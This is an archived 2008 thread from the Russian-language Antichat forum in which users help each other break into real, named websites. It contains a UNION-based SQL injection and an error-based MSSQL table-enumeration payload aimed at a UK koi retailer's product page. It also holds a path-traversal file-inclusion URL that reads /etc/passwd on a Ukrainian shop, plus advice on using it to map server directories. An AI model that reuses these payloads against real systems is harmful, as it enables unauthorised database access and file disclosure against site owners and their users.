ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.06.2008, 22:19
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://www.bjsornamentalkoi.co.uk/product.asp?product_id=-1+union+select+1--
выдает ошибку..
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.
help
0nep@t0p
rewrite
Последний раз редактировалось sabe; 23.06.2008 в 22:40..
|
|
|
23.06.2008, 22:42
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
171038
Репутация:
11
|
|
Сообщение от sabe
выдает ошибку..
help
0nep@t0p
rewrite
ну так ... тебе пишет что разное количество параметров...
Код:
http://www.bjsornamentalkoi.co.uk/product.asp?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
|
|
|
|
23.06.2008, 22:45
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 sabe
А что хелп то? Крути всё нормально MSSQL
_http://www.bjsornamentalkoi.co.uk/product.asp?product_id=1+or+1=(SELECT+TOP+1+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NA ME+NOT+IN+('links','links_category'))--
2 theli
Забавно  |
|
|
|
23.06.2008, 22:51
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
171038
Репутация:
11
|
|
Сообщение от jokester
2 sabe 2 theli
Забавно ой, чёго-то совсем забыл что оно так удобно пишет ошибки 
|
|
|
|
23.06.2008, 22:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Хм...А имена таблиц и полей(если стоят по умолчанию) на всех хостящихся на нём сайтов - одинаковые ?
|
|
|
|
23.06.2008, 22:54
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
спс... я просто не люблю microsoft  |
|
|
|
23.06.2008, 22:57
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
надо смотреть по обстоятельствам... например на хостинге висят два форума на двух разных сайтах.. если движки самописные то названия таблиц и колонок такое как в движке задаано было... а если паблик движки то там названия таблиц и колонок можно узнать поставив себе на локалхост или еще куда-нибудь форум и посмотрев (не будешь же ты во всех скриптах менять название таблицы и колонок=))...
|
|
|
|
24.06.2008, 17:20
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от gisTy
надо смотреть по обстоятельствам...
Мде... чёт я не подумал).Всё равно попробую)
|
|
|
|
24.06.2008, 00:31
|
|
Новичок
Регистрация: 21.06.2008
Сообщений: 17
Провел на форуме:
153953
Репутация:
18
|
|
http://shop.tuse.com.ua/basket/?mode=../../../../../../../../etc/passwd%00&id=43
есть лькальный инклуд,что с ним можно сделать? =\
|
|
|
|
24.06.2008, 00:40
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
при помощи него можно смотреть различные файлы на сервере..
можно еще проверять наличие папок, например так:
Код:
www.site.com/script.php?page=../../../../../../../../var/www/../../etc/passwd
где вместо /var/www ты подставляешь проверяемую папку
если выведется содержимое /etc/passwd то значит папка существует, если выскочит ошибка - то нет такой страницы.. соответстветсвенно проверяй другие места..
Последний раз редактировалось gisTy; 24.06.2008 в 00:44..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид